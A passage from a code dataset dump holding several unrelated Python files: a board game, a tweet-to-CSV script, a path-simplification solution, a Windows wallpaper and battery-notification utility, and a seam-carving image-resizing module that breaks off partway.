dice to get out of start anyways\n self.move_freely(dice)\n self.move_freely(next_dice)\n\n if next_dice == 6:\n # repeat if the next throw was another 6\n self.turn()\n else:\n # normal gameplay\n self.move_freely(dice)\n else:\n # roll 3 times to get out of start\n for i in range(0, 3):\n print(\"Roll\", i+1)\n dice = self.roll_dice()\n if dice == 6:\n next_dice = self.roll_dice()\n self.place_piece_outside()\n # TODO: check for kick and own pieces!\n self.get_piece_on_start().go_forward(next_dice)\n if next_dice == 6:\n self.turn()\n break\n\n # player can (freely) select which piece to move (i.e. doesnt need to move from start)\n def move_freely(self, dice):\n i = int(input(\"Select Piece: \"))\n pos_real = self.calculate_realposition(self.pieces[i-1])\n newpos_real = self.calculate_realposition(self.pieces[i-1], dice)\n\n if pos_real != \"Start\" and pos_real != \"Finish\" and newpos_real != \"Outside\" :\n if self.is_field_free(newpos_real):\n self.pieces[i-1].go_forward(dice)\n else:\n # Man kann sich nicht selber rausschlagen und muss eine andere Figur nehmen.\n # TODO: was ist wenn das nicht möglich ist..?\n pass\n else:\n print(\"Cant move this piece\")\n self.move_freely(dice)\n\n # Returns number between 1 and 6\n def roll_dice(self):\n dice = random.randint(1, 6)\n print(\"Rolling dice:\", dice)\n return dice\n\n # check if field is free and kick other players if needed\n def is_field_free(self, realposition):\n free = True\n\n for player in self.parent.players:\n if player.id != self.id: # check for other player pieces\n for piece in player.pieces:\n if piece.position < self.parent.game_size and piece.position != -1 and self.calculate_realposition(piece) == realposition:\n print(\"kicking piece on position\", realposition, \" owner: player\", player.id+1)\n piece.position = -1\n else: # check for own pieces\n for piece in player.pieces:\n if self.calculate_realposition(piece) == realposition and self.calculate_realposition(piece) != \"Finish\": # and realposition is inside finish\n print(\"Field is not free or outside the board\")\n free = False\n return free\n\n # returns the real positon of a piece. use dice to check future positions, leave blank to use default 0 (current position)\n def calculate_realposition(self, piece, dice=0):\n position = piece.position + dice\n boardsize = self.parent.game_size\n\n # Preparation for finish-sorting\n # Check for start/finish\n #if boardsize <= position <= boardsize+3:\n # return \"Finish\"\n #if position > boardsize+3:\n # return \"Outside\"\n\n # atm no check in finish\n if boardsize <= position:\n return \"Finish\"\n if position == -1:\n return \"Start\"\n\n\n # offset-calculation-wrap-around-magic - do not touch\n if piece.parent.offset != 0:\n if position >= (boardsize-piece.parent.offset):\n return position - (boardsize-piece.parent.offset)\n else:\n return position + piece.parent.offset\n else:\n return position\n\n # preparation for custom player names\n def set_name(self, name):\n self.name = name\n\n\nclass Piece:\n def __init__(self, parent):\n self.parent = parent\n self.position = -1\n\n # move piece, do not call directly, use player-functions as wrapper to handle kicking etc\n def go_forward(self, distance):\n print(\"Moving piece from\", self.position, \"to\", self.position + distance)\n self.position = self.position + distance\n print(\"Real new position:\", self.parent.calculate_realposition(self))\n\n\nclass Gamefield:\n def __init__(self, parent):\n self.parent = parent\n self.size = self.parent.game_size\n self.color = [colorama.Fore.RED, colorama.Fore.GREEN, colorama.Fore.YELLOW, colorama.Fore.BLUE, colorama.Fore.MAGENTA, colorama.Fore.CYAN, colorama.Back.RED, colorama.Back.GREEN, colorama.Back.YELLOW, colorama.Back.BLUE, colorama.Back.MAGENTA, colorama.Back.CYAN, colorama.Back.WHITE]\n self.color_reset = colorama.Fore.RESET + colorama.Back.RESET\n \n # Output a simple board\n def show(self, players):\n # check for pieces in finish\n print (\"Finish: \", end='')\n for player_index, player in enumerate(players):\n for piece_index, piece in enumerate(player.pieces):\n if \"Finish\" == player.calculate_realposition(piece):\n print(self.color[player_index] + str(piece_index+1) + self.color_reset, end='')\n # newline\n print(\"\")\n\n # show board from end to start (descending)\n for i in reversed(range(0, self.size)):\n # add space for single digits\n if i < 10:\n print(\" \", end='')\n\n print (str(i) + \": \", end='')\n\n # show pieces in player colors\n for player_index, player in enumerate(players):\n for piece_index, piece in enumerate(player.pieces):\n if i == player.calculate_realposition(piece):\n print(self.color[player_index] + str(piece_index+1) + self.color_reset, end='')\n\n # show start/finish locations in player colors\n for player_index, player in enumerate(players):\n if i == player.offset:\n print(self.color[player_index] + \" (Start/Finish Player \" + str(player_index+1) + \")\" + self.color_reset, end='')\n\n #newline\n print(\"\")\n\n\nif __name__ == \"__main__\":\n # Start the game\n game = MenschAergereDichNicht(3)\n print(\"Version\", game.version)\n","sub_path":"mensch.py","file_name":"mensch.py","file_ext":"py","file_size_in_byte":11582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"362456022","text":"\"\"\"Script made to gather tweets and store them in a CSV file.\"\"\"\nimport sys\nimport os\nimport logging\nimport argparse\nfrom argparse import RawTextHelpFormatter\nfrom tweets_handler import ApiHandler\nfrom csv_handler import CSVFileHandler\nfrom utils import validate_args\n\n\ndef main(args):\n \"\"\"Main entry point for the script.\"\"\"\n logging.info('Starting script'.format(args.query_word))\n logging.debug('Input parameters: \\'{}\\', \\'{}\\', \\'{}\\''\n .format(args.search_type, args.query_word, args.out_dir))\n if validate_args(args):\n api_handler = ApiHandler(args.query_word, args.search_type)\n tweets = api_handler.get_tweets()\n csv_handler = CSVFileHandler(args, tweets)\n csv_handler.export_csv()\n else:\n logging.info('Script stopped')\n\n\ndef get_parser():\n \"\"\"Defines the parser object for argparse.\"\"\"\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=RawTextHelpFormatter)\n parser.add_argument('search_type', metavar='search_type', type=str,\n choices=['by-keyword', 'by-user'],\n help='Specifies the type of search to be performed.\\n'\n + 'Values accepted:\\n'\n + '-\\'by-keyword\\'\\n'\n + '-\\'by-user\\'\\n')\n parser.add_argument('query_word', metavar='query_word', type=str,\n help='A keyword or a username to be used in the search.')\n parser.add_argument('out_dir', metavar='out_dir', type=str,\n help='Directory where the CSV file will be saved.')\n parser.add_argument('-v', '--verbose', dest='verbose', action='store_true',\n help='Increases log verbosity.')\n return parser\n\n\nif __name__ == '__main__':\n parser = get_parser()\n args = parser.parse_args()\n logging_level = logging.INFO\n if args.verbose:\n logging_level = logging.DEBUG\n logging.basicConfig(level=logging_level,\n format='%(asctime)-15s %(message)s')\n main(args)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"470636557","text":"class Solution:\n # @param A : string\n # @return a strings\n def simplifyPath(self, A):\n split_A = A.split('/')\n # split_A = split_A[1:-1]\n stack = []\n for val in split_A:\n if val == '.' or val == '':\n continue\n elif val == '..':\n if len(stack) > 0:\n stack.pop()\n else:\n stack.append(val)\n result = \"/\"\n # print(stack)\n for i in range(len(stack)):\n result += stack[i]\n if i != len(stack) - 1:\n result += '/'\n return result\n\n\ndef simplifyPath(self, A):\n st = []\n A = [x for x in A.split('/') if x != '']\n for d in A:\n if d == '..':\n if st != []:\n st.pop()\n elif d != '.':\n st.append(d)\n return '/' + '/'.join(st) \n","sub_path":"interviewbit/simplify_directory_path.py","file_name":"simplify_directory_path.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"208803869","text":"'''\nAuthor: Sharath Sunil\nGitHub: https://github.com/Anonymous1846\nCopyright: 2021\nLanguage:Python\n\nA Simple Python program/script which parallely moniters the battery status, and changes the backgroud wallpaper at an interval of 2 minutes !\n'''\nfrom shutil import copyfile\nfrom time import sleep\nfrom plyer import notification\nimport schedule\nimport random\nimport psutil\nimport ctypes\nimport sys\nimport os\n\nsys.setrecursionlimit(10**6) #recursion limit set to 10^6 otherwise error will pop up !\n'''\nThe currently logged in user is obtained then we locate his/her startup directory and check if the file is already there, if not\nthen we copy the file from the current location to the startup directory.\nThe pictures are loaded from the camera roll directory of the currenty logged in user !\n'''\ncurrent_user=os.getlogin() #the currently logged in user name\nexe_path=f'C:\\\\Users\\\\{current_user}\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\PCUtility Tool.pyw'\nPIC_DIRECTORY=f'C:\\\\Users\\\\{current_user}\\\\Pictures\\\\Camera Roll' #the directory where the photos where the photos are stored and it can be changed !\nEXTS=['jpg','jpeg','png']\nPICS=[picture for picture in os.listdir(PIC_DIRECTORY) if any(picture.endswith(extension) for extension in EXTS)] #filtering out only the pictures with png, jpg, and jpeg !\n\nif not os.path.isfile(exe_path):\n\tcopyfile('./PCUtility Tool.pyw',exe_path) #if it is not in the startup folder then copy it to the startup folder !\n\n'''\nThe helper function for randomly choose a image for the background, and the image is set using the ctypes interface\nSystemParametersInfoW function, the dir is the camera roll directory, to change to the directory of your choice, please\nchange the variable PIC_DIRECTORY !\n\nreturn: None\n\nparams: None\n'''\ndef _change_wallpaper():\n\twallpaper=random.choice(PICS)#a random pic is chosen from the list !\n\tctypes.windll.user32.SystemParametersInfoW(20, 0,os.path.join(PIC_DIRECTORY,wallpaper), 0) #the path to the wallpapper provided in the third parameter !\n\n'''\nThe function which actually makes a call to the above function, here the _change_wallpaper function is called at an interval of 2 mins.\nWe can change the interval to our liking !\n\nreturn: None\n\nparams: None\n'''\ndef change_wallpaper():\n\tschedule.every(2).minutes.do(change_wallpaper) #the schedule library performs a particular operation every 2 minutes(can be changed !)\n\twhile True:\n\t\tschedule.run_pending()\n\t\tsleep(1)\n\n\n'''\nThe battery information is retrieved by the python module named psutil, which is a cross platform utility\nused for getting the process/services information of the OSes. The basic idea of the function is to warn the user\nto charge the laptop, when the battery percentage is less than 25 and remove the charger if the battery % is\ngreater than 95%\n\nParams:None\n\nReturn:None\n'''\ndef _check_battery_status():\n\tbattery_info=psutil.sensors_battery()\n\tbattery_percentage = battery_info.percent #grabbing the battery percent\n\tis_plugged_in = battery_info.power_plugged # grabbing the info whether the battery is is_plugged_in or not !\n\tif is_plugged_in and float(battery_percentage) > 95.00:\n\t\tnotification.notify(\"PC Util v1.0\", \"Please Remove The Charging Cable, The Battery is 95%+ !\", timeout = 10)\n\telif not is_plugged_in and float(battery_percentage) < 25.00:\n\t\tnotification.notify(\"PC Util v1.0\", \"Please Plug In The Charger, Your Battery Is Less Than 25% !\", timeout = 10)\n\n\n'''\nThis function will call the above function in an interval of 2 secs, so that it can check the status at each iteration\n\nparams: None\n\nReturn: None\n\n'''\ndef check_battery_status():\n\tschedule.every(30).seconds.do(_check_battery_status)\n\twhile 1:\n\t\tschedule.run_pending()\n\t\tsleep(1)\n'''\nThe fucntion will excute the check status and change wallpaper function in an interval of 30 secs and 2mins respectively !\n\nParams: None\n\nReturn:None\n'''\n\ndef do_tasks():\n\tschedule.every(30).seconds.do(_check_battery_status)\n\tschedule.every(2).minutes.do(_change_wallpaper)\n\twhile True:\n\t\tschedule.run_pending()\n\t\tsleep(1)\n\ndo_tasks() # function to execute the scheduled tasks \n","sub_path":"PCUtility Tool/PCUtility Tool.py","file_name":"PCUtility Tool.py","file_ext":"py","file_size_in_byte":4114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"577089708","text":"import copy\nimport heapq\nfrom math import fabs, log\n\nfrom PIL import Image\n\n\n# encapulates data that helps build the pixle array into a graph of valid directed paths\n# with edge weights corresponding to energies of pixles\nclass Edge:\n def __init__(self, source, sink, weight):\n self.source = source\n self.sink = sink\n self.weight = weight\n\n\n def __cmp__(self, other):\n return (self.weight - other.weight)\n\n\n def __str__(self):\n return \"[%s]\" % str(self.weight)\n\n\ndef seam_dijk(image):\n heap = TestHeap()\n path = []\n dic = {}\n prev = {}\n\n def get_path(node):\n path.append(prev[node])\n if prev[node] is None:\n return\n else:\n get_path(prev[node].pos)\n\n for pix in image.top_horz_row():\n heap.add(Edge(None, pix, pix.energy))\n dic[pix.pos] = pix.energy\n prev[pix.pos] = None\n\n while True:\n edge = heap.get_top()\n neighbors = []\n\n if (edge.sink.pos[1] == (image.height-1)):\n path.append(edge.sink)\n get_path(edge.sink.pos)\n return [p.pos for p in path[:-1]]\n else:\n neighbors.append(\n image.pixels[(edge.sink.pos[0], (edge.sink.pos[1]+1))])\n if edge.sink.pos[0] == (image.width-1):\n neighbors.append(\n image.pixels[((edge.sink.pos[0]-1), (edge.sink.pos[1]+1))])\n\n elif edge.sink.pos[0] == 0:\n neighbors.append(\n image.pixels[((edge.sink.pos[0]+1), (edge.sink.pos[1]+1))])\n\n else:\n neighbors.append(\n image.pixels[((edge.sink.pos[0]-1), (edge.sink.pos[1]+1))])\n neighbors.append(\n image.pixels[((edge.sink.pos[0]+1), (edge.sink.pos[1]+1))])\n\n for n in neighbors:\n cost = (edge.weight+n.energy)\n if n.pos in dic:\n if (dic[n.pos] < cost):\n continue\n else:\n dic[n.pos] = cost\n prev[n.pos] = edge.sink\n heap.add(Edge(edge, n, cost))\n else:\n dic[n.pos] = cost\n prev[n.pos] = edge.sink\n heap.add(Edge(edge, n, cost))\n\n\ndef seam_dyn(image):\n seam = []\n ans = [0]*(image.width)\n paths = [[0 for x in range(image.height)] for y in range(image.width)]\n\n def min_index(j, a):\n return j+(a.index(min(a)))\n\n for i in range(0, image.height):\n tmp = [0]*(image.width)\n\n ind = min_index(0, [ans[0], ans[1]])\n paths[0][i] = ind\n tmp[0] = ans[ind]+image.pixels[(0, i)].energy\n\n for j in range(1, image.width-1):\n ind = min_index(j, [ans[j-1], ans[j], ans[j+1]])\n paths[j][i] = ind-1\n tmp[j] = ans[ind-1]+image.pixels[(j, i)].energy\n\n ind = min_index(\n image.width-1, [ans[image.width-2], ans[image.width-1]])\n paths[image.width-1][i] = ind-1\n tmp[image.width-1] = ans[ind-1]+image.pixels[(image.width-1, i)].energy\n\n ans = tmp\n\n ind = min_index(0, ans)\n\n for i in range(image.height-1, -1, -1):\n seam.append((ind, i))\n ind = paths[ind][i]\n\n return seam\n\n\ndef three_three_filter(pixel, neighbors, a, b):\n [n1, n2, n3, n4, px, n5, n6, n7, n8] = neighbors\n \"\"\"\n | n1 n2 n3 |\n | n4 px n5 |\n | n6 n7 n8 |\n \"\"\"\n\n pos_dx = a * n4.gray + b * n1.gray + b * n6.gray\n neg_dx = - a * n5.gray - b * n3.gray - b * n8.gray\n dx = pos_dx + neg_dx\n\n pos_dy = a * n7.gray + b * n8.gray + b * n6.gray\n neg_dy = - a * n2.gray - b * n3.gray - b * n1.gray\n dy = pos_dy + neg_dy\n\n # adds absolute values of energies to get the overall energy\n pixel.energy = fabs(dx) + fabs(dy)\n\n # this pixel does not need to be recalculated\n pixel.recalculate = False\n\n return pixel\n\n\ndef Kroon_op(pixel, neighbors):\n return three_three_filter(pixel, neighbors, 61, 17)\n\n\ndef Scharr_op(pixel, neighbors):\n return three_three_filter(pixel, neighbors, 10, 3)\n\n\ndef Sobel_op(pixel, neighbors):\n return three_three_filter(pixel, neighbors, 2, 1)\n\n\ndef five_five_filter(pixel, n, a, b, c, d, e, f):\n pos_dx = a*n[11].gray + b*n[10].gray + c*(n[6].gray + n[16].gray) + d*(\n n[5].gray + n[15].gray) + e*(n[1].gray + n[21].gray) + f*(n[0].gray+n[20].gray)\n neg_dx = a*n[13].gray + b*n[14].gray + c*(n[8].gray + n[18].gray) + d*(\n n[9].gray + n[8].gray) + e*(n[3].gray + n[23].gray) + f*(n[4].gray + n[24].gray)\n dx = pos_dx - neg_dx\n pos_dy = a*n[17].gray + b*n[22].gray + c*(n[16].gray + n[18].gray) + d*(\n n[21].gray + n[23].gray) + e*(n[15].gray + n[19].gray) + f*(n[20].gray+n[24].gray)\n neg_dy = a*n[7].gray + b*n[2].gray + c*(n[6].gray + n[8].gray) + d*(\n n[1].gray + n[3].gray) + e*(n[5].gray + n[9].gray) + f*(n[0].gray + n[4].gray)\n dy = pos_dy - neg_dy\n\n pixel.energy = fabs(dx) + fabs(dy)\n\n pixel.recalculate = False\n\n return pixel\n\n\ndef Sobel_five_op(pixel, neighbors):\n return five_five_filter(pixel, neighbors, 20, 10, 10, 8, 4, 5)\n\n\ndef Scharr_five_op(pixel, neighbors):\n return five_five_filter(pixel, neighbors, 6, 3, 2, 2, 1, 1)\n\n\ndef entropy(pixel, square):\n num_bins = 25\n b = 0\n hist_len = len(square)\n dim = hist_len**(.5)\n histogram = {}\n for i in range(num_bins):\n histogram[b + (256//num_bins)*i] = 1\n #histogram = {b:1, 2*b:1, 3*b:1, 4*b:1, 5*b:1, 6*b:1, 7*b:1, 8*b:1, 9*b:1, 10*b:1}\n for x in range(hist_len):\n for k, v in histogram.items():\n if (square[x].gray < k):\n histogram[k] += 1\n break\n square_prob = [float(v)//hist_len for k, v in histogram.items()]\n pixel.energy = -sum([p*(log(p, 2)) for p in square_prob])\n pixel.energy = pixel.energy**5\n pixel.recalculate = False\n return pixel\n\n\n# Grayscales the image so that we can run energy calculations on it\ndef to_grayscale(img):\n return img.convert(\"L\")\n\n\n# creates image sc object from python image library representation of a picture\ndef from_pil(im):\n this_id = 0\n pixels = {}\n width, height = im.size\n data = im.getdata()\n for w in range(width):\n for h in range(height):\n\n color = data[h * width + w]\n # color image for the normal picture and have an rgb tuple\n if isinstance(color, tuple):\n pixels[(w, h)] = Pixel((w, h), color)\n this_id += 1\n # grayscale image for the energy picture and an int\n elif isinstance(color, int):\n pixels[(w, h)] = Pixel((w, h), (0, 0, 0), gray=color)\n return pixels, width, height\n\n\nclass sc_Image:\n def __init__(self, dimensions, pixels, PIL):\n self.width = dimensions[0]\n self.height = dimensions[1]\n self.pixels = pixels\n self.dim = 3\n self.PIL = PIL\n\n # Replaced the im.getpixels calls with an im.getdata for performance reasons\n @classmethod\n def from_filepath(cls, filepath):\n im = Image.open(filepath)\n pixels, width, height = from_pil(im)\n return cls((width, height), pixels, im)\n\n\n def to_jpeg(self, filepath):\n data = [(0, 0, 0)] * (self.width * self.height)\n for w in range(self.width):\n for h in range(self.height):\n data[h*self.width + w] = self.pixels[(w, h)].rgb\n im = Image.new(\"RGB\", (self.width, self.height))\n im.putdata(data)\n im.save(filepath, \"JPEG\")\n\n\n def shrink(self, to_remove, orientation=\"vertical\", energy='sobel', alg='dyn'):\n if orientation == 'horizontal':\n self.transpose()\n counter = 0\n for i in range(to_remove):\n counter += 1\n self.set_energies(energy)\n seam = self.remove_seam_vert2(alg)\n if orientation == 'horizontal':\n self.transpose()\n\n\n def enlarge(self, new_pixels, orientation='vertical', energy='e1', alg='dyn', inverse=False):\n if orientation == 'horizontal':\n self.transpose()\n\n original_pixels = copy.deepcopy(self.pixels)\n original_width = self.width\n original_height = self.height\n seams = self.get_n_seams(new_pixels, energy, alg, inverse)\n\n self.width = original_width\n self.height = original_height\n for s in seams:\n self.insert_seam(original_pixels, s)\n self.pixels = original_pixels\n\n if orientation == 'horizontal':\n self.transpose()\n\n\n def enlarge_object_1d(self, new_pixels, orientation=\"vertical\", energy='sobel', alg='dyn'):\n self.shrink(new_pixels, orientation, energy, alg)\n self.enlarge(new_pixels, orientation, energy, alg, True)\n\n\n def enlarge_object(self, seams, energy='sobel', alg='dyn'):\n self.shrink(seams//2, 'vertical', energy, alg)\n self.shrink(seams//2, 'horizontal', energy, alg)\n\n self.enlarge(seams//2, 'vertical', energy, alg)\n self.enlarge(seams//2, 'horizontal', energy, alg)\n\n\n def remove_object(self, rgb, tolerance=5, energy='sobel', alg='dyn'):\n def check_rgb(rgb1, rgb2, tolerance):\n r1, g1, b1 = rgb1\n r2, g2, b2 = rgb2\n return (r2-tolerance < r1 < r2+tolerance and\n g2-tolerance < g1 < g2+tolerance and b2-tolerance < b1 < b2+tolerance)\n\n max_width = 0\n for h in range(self.height):\n width = 0\n for w in range(self.width):\n if check_rgb(self.pixels[(w, h)].rgb, rgb, tolerance):\n self.pixels[(w, h)].energy = -99999999999\n self.pixels[(w, h)].to_remove = True\n self.pixels[(w, h)].recalculate = False\n width += 1\n if width > max_width:\n max_width = width\n\n self.shrink(max_width, energy=energy, alg=alg)\n\n for h in range(self.height):\n for w in range(self.width):\n self.pixels[(w, h)].original_pos = self.pixels[(w, h)].pos\n\n self.enlarge(max_width, energy=energy, alg=alg)\n\n\n def to_energy_pic(self, filepath, energy='sobel'):\n original_pixels = self.pixels\n gray_pixels, w, h = from_pil(to_grayscale(self.PIL))\n self.pixels = gray_pixels\n self.set_energies(energy)\n\n data = [0] * (self.width * self.height)\n for w in range(self.width):\n for h in range(self.height):\n data[h*self.width + w] = self.pixels[(w, h)].energy\n im = Image.new(\"L\", (self.width, self.height))\n im.putdata(data)\n im.save(filepath, \"JPEG\")\n\n self.pixels = original_pixels\n\n\n def to_seam_pic(self, filepath, n, energy='sobel', alg='dyn', orientation='vertical'):\n\n if orientation == 'horizontal':\n self.transpose()\n\n original_pixels = copy.deepcopy(self.pixels)\n original_width = self.width\n original_height = self.height\n\n seams = self.get_n_seams(n, energy, alg)\n\n to_color = []\n for seam in seams:\n to_color.append(\n [p.original_pos for p in [_f for _f in seam if _f]])\n\n for seam in to_color:\n for pos in seam:\n original_pixels[pos].rgb = (300, 0, 0)\n\n self.pixels = original_pixels\n self.width = original_width\n self.height = original_height\n\n if orientation == 'horizontal':\n self.transpose()\n\n self.to_jpeg(filepath)\n\n\n def get_neighbors_simple(self, pos, pixels):\n x, y = pos\n data = []\n for j in range(y+(self.dim//2), y-(self.dim//2+1), -1):\n for i in range(x-(self.dim//2), x+(self.dim//2+1)):\n try:\n data.append(pixels[(i, j)])\n except KeyError:\n data.append(None)\n return data\n\n\n def recalculate_neighbors(self, pos):\n for p in self.get_neighbors_simple(pos, self.pixels):\n if p is not None:\n p.to_recalculate()\n\n\n # gets the dim x dim square of pixels of the pixel at pos for energy functions\n def get_neighbors(self, pos, pixels):\n data = self.get_neighbors_simple(pos, pixels)\n\n if (self.dim == 3):\n edge_replace = {0: [2, 6, 8], 1: [7], 2: [0, 8, 6],\n 3: [5], 5: [3], 6: [0, 8, 2], 7: [1], 8: [2, 6, 0]}\n\n for i in range(len(data)):\n if data[i] is None:\n for replace_with in edge_replace[i]:\n if data[replace_with] is not None:\n data[i] = data[replace_with]\n break\n return data\n\n def get_pixel(self, pos):\n if pos in self.pixels:\n return self.pixels[pos]\n else:\n return None\n\n\n def make_mirror_dic(self):\n marg = self.dim//2\n temp_pix = self.pixels\n\n for h in list(range(-marg, 0)) + list(range(self.height, self.height + marg)):\n for w in range(self.width):\n if h < 0:\n temp_pix[(w, h)] = Pixel(\n (w, h), (w, h), self.pixels[(w, 0)].gray)\n else:\n temp_pix[(w, h)] = Pixel((w, h), (w, h),\n self.pixels[(w, self.height - 1)].gray)\n\n for w in list(range(-marg, 0)) + list(range(self.width, self.width + marg)):\n for h in range(- marg, self.height + marg):\n if w < 0:\n if h < 0:\n temp_pix[(w, h)] = Pixel(\n (w, h), (w, h), self.pixels[(0, 0)].gray)\n elif h >= self.height:\n temp_pix[(w, h)] = Pixel((w, h), (w, h),\n self.pixels[(0, self.height-1)].gray)\n else:\n temp_pix[(w, h)] = Pixel(\n (w, h), (w, h), self.pixels[(0, h)].gray)\n else:\n if h < 0:\n temp_pix[(w, h)] = Pixel((w, h), (w, h),\n self.pixels[(self.width-1, 0)].gray)\n elif h >= self.height:\n temp_pix[(w, h)] = Pixel(\n (w, h), (w, h), self.pixels[(self.width-1, self.height-1)].gray)\n else:\n temp_pix[(w, h)] = Pixel((w, h), (w, h),\n self.pixels[(self.width-1, h)].gray)\n return temp_pix\n\n\n def set_energies(self, algorithm='sobel'):\n def set_energy_e1_Sobel(pixel):\n if pixel.recalculate:\n return Sobel_op(pixel, self.get_neighbors(pixel.pos, self.pixels))\n else:\n return pixel\n\n\n def set_energy_e1_Scharr(pixel):\n if pixel.recalculate:\n return Scharr_op(pixel, self.get_neighbors(pixel.pos, self.pixels))\n else:\n return pixel\n\n\n def set_energy_e1_Kroon(pixel):\n if pixel.recalculate:\n return Kroon_op(pixel, self.get_neighbors(pixel.pos, self.pixels))\n else:\n return pixel\n\n\n def set_energy_e1_Sobel_5(pixel, pixels):\n if pixel.recalculate:\n return Sobel_five_op(pixel, self.get_neighbors(pixel.pos, pixels))\n else:\n return pixel\n\n\n def set_energy_e1_Scharr_5(pixel, pixels):\n if pixel.recalculate:\n return Scharr_five_op(pixel, self.get_neighbors(pixel.pos, pixels))\n else:\n return pixel\n\n\n def set_energy_entropy(pixel, pixels):\n if pixel.recalculate:\n return entropy(pixel, self.get_neighbors(pixel.pos, self.pixels))\n else:\n return pixel\n\n self.dim = 3\n if algorithm == 'sobel':\n list(map(set_energy_e1_Sobel, list(self.pixels.values())))\n\n elif algorithm == 'scharr':\n list(map(set_energy_e1_Scharr, list(self.pixels.values())))\n\n elif algorithm == 'kroon':\n list(map(set_energy_e1_Kroon, list(self.pixels.values())))\n\n elif (algorithm == 'sobel5' or algorithm == 'scharr5'):\n self.dim = 5\n temp_pix = self.make_mirror_dic()\n\n for h in range(self.height):\n for w in range(self.width):\n if algorithm == 'sobel5':\n set_energy_e1_Sobel_5(self.pixels[(w, h)], temp_pix)\n if algorithm == 'scharr5':\n set_energy_e1_Scharr_5(self.pixels[(w, h)], temp_pix)\n\n elif algorithm == 'entropy':\n self.dim = 9\n temp_pix = self.make_mirror_dic()\n for h in range(self.height):\n for w in range(self.width):\n set_energy_entropy(self.pixels[(w, h)], temp_pix)\n\n else:\n raise Exception(\n \"%s is not one of the implemented algorithms\" % algorithm)\n\n\n def get_next_seam(self, alg):\n if alg == 'dijk':\n return seam_dijk(self)\n else:\n return seam_dyn(self)\n return seam\n\n\n def top_vert_row(self):\n return list(map(self.get_pixel, [(0, h) for h in range(self.height)]))\n\n\n def top_horz_row(self):\n return list(map(self.get_pixel, [(w, 0) for w in range(self.width)]))\n\n\n def remove_seam_vert2(self, alg, return_pixels=False):\n seam = self.get_next_seam(alg)\n to_remove = seam\n if return_pixels:\n pixels = [copy.deepcopy(self.get_pixel(p)) for p in seam]\n else:\n pixels = []\n\n for h in range(self.height):\n decrement = False\n for w in range(self.width):\n if not decrement:\n if (w, h) in to_remove:\n decrement = True\n self.recalculate_neighbors((w, h))\n\n else:\n self.pixels[(w, h)].shift_pos(-1, 0)\n self.pixels[(w-1, h)] = self.pixels[(w, h)]\n\n del self.pixels[self.width-1, h]\n self.width -= 1\n\n return pixels\n\n\n def insert_seam(self, pixels, seam):\n for pixel in seam:\n h = pixel.pos[1]\n\n for w in range(self.width-1, -1, -1):\n if pixel.original_pos == (w, h):\n pixel.pos = (w+1, h)\n pixels[(w+1, h)] = pixel\n # update rgb value\n left = pixels[(w, h)].rgb\n\n if (w+2, h) in pixels:\n right = pixels[(w+2, h)].rgb\n else:\n right = pixel.rgb\n\n pixel.rgb = self.average_rbg(left, right)\n break\n\n else:\n pixels[(w, h)].shift_pos(1, 0)\n pixels[(w+1, h)] = pixels[(w, h)]\n\n self.width += 1\n return pixels\n\n\n def average_rbg(self, rgb1, rgb2):\n r1, g1, b1 = rgb1\n r2, g2, b2 = rgb2\n\n return ((r1+r2)//2, (g1+g2)//2, (b1+b2)//2)\n\n\n def get_n_seams(self, n, energy, alg, inverse=False):\n seams = []\n for i in range(n):\n self.set_energies(energy)\n if inverse:\n self.invert_energies()\n seam = self.remove_seam_vert2(alg, return_pixels=True)\n seams.append(seam)\n\n return seams\n\n\n def invert_energies(self):\n for w in range(self.width):\n for h in range(self.height):\n self.pixels[(w, h)].energy *= -1\n\n\n def transpose(self):\n new_pix = {}\n for i in range(self.width):\n for j in range(self.height):\n new_pix[(j, i)] = Pixel((j, i), self.pixels[(i, j)].rgb)\n self.pixels = new_pix\n tmp = self.height\n self.height = self.width\n self.width = tmp\n\n\nclass Pixel:\n def __init__(self, pos, rgb, gray=None):\n self.pos = pos\n self.original_pos = pos\n self.rgb = rgb\n\n if gray is None:\n r, g, b = self.rgb\n self.gray = r + 256 * g + (256 ^ 2) * b\n else:\n self.gray = gray\n\n self.energy = 0\n\n self.to_remove = False\n\n self.recalculate = True\n\n\n def shift_pos(self, dx, dy):\n self.pos = (self.pos[0]+dx, self.pos[1]+dy)\n\n\n def to_recalculate(self):\n if not self.to_remove:\n self.recalculate = True\n\n\n def __str__(self):\n return \"[%s , %s]\" % (str(self.pos), str(self.energy))\n\n\n# im = sc_Image.from_filepath(\"images/giza.jpg\")\n# im.to_energy_pic('images/giza_energy_map_entropy.jpg', 'entropy')\n# im.to_energy_pic('images/giza_energy_map_sobel.jpg', 'sobel')\n# im.to_energy_pic('images/giza_energy_map_kroon.jpg', 'kroon')\n# im.to_energy_pic('images/giza_energy_map_sobel5.jpg', 'sobel5')\n# im.to_energy_pic('images/giza_energy_map_scharr5.jpg', 'scharr5')\n\n#shrinking giza by 120 pixels\n# im = sc_Image.from_filepath(\"images/giza.jpg\")\n# im.shrink(120,orientation = 'vertical', energy = 'kroon', alg = 'dyn')\n# im.to_jpeg(\"images/giza_shrank.jpg\")\n\n# #displays seams created by sobel\n# im = sc_Image.from_filepath(\"images/giza.jpg\")\n# im.to_seam_pic(\"images/giza_sobel.jpg\",80, energy = 'sobel')\n\n#displays seams created by scharr\n# im = sc_Image.from_filepath(\"images/giza.jpg\")\n# im.to_seam_pic(\"images/giza_scharr.jpg\",80, energy = 'scharr')\n\n# #displays seams created by kroon\n# im = sc_Image.from_filepath(\"images/giza.jpg\")\n# im.to_seam_pic(\"images/giza_kroon.jpg\",80, energy = 'kroon')\n\n#displays seams created by scharr5\n# im = sc_Image.from_filepath(\"images/giza.jpg\")\n# im.to_seam_pic(\"images/giza_scharr5.jpg\",80, energy = 'scharr5')\n\n#horiztonal seam picture for night\n# im = sc_Image.from_filepath(\"images/giza.jpg\")\n# im.to_seam_pic(\"images/giza_night_seams.jpg\", 120,orientation = 'horizontal', energy = 'scharr', alg = 'dyn')\n\n#displays seams found by dijkstra's algorithm\n# im = 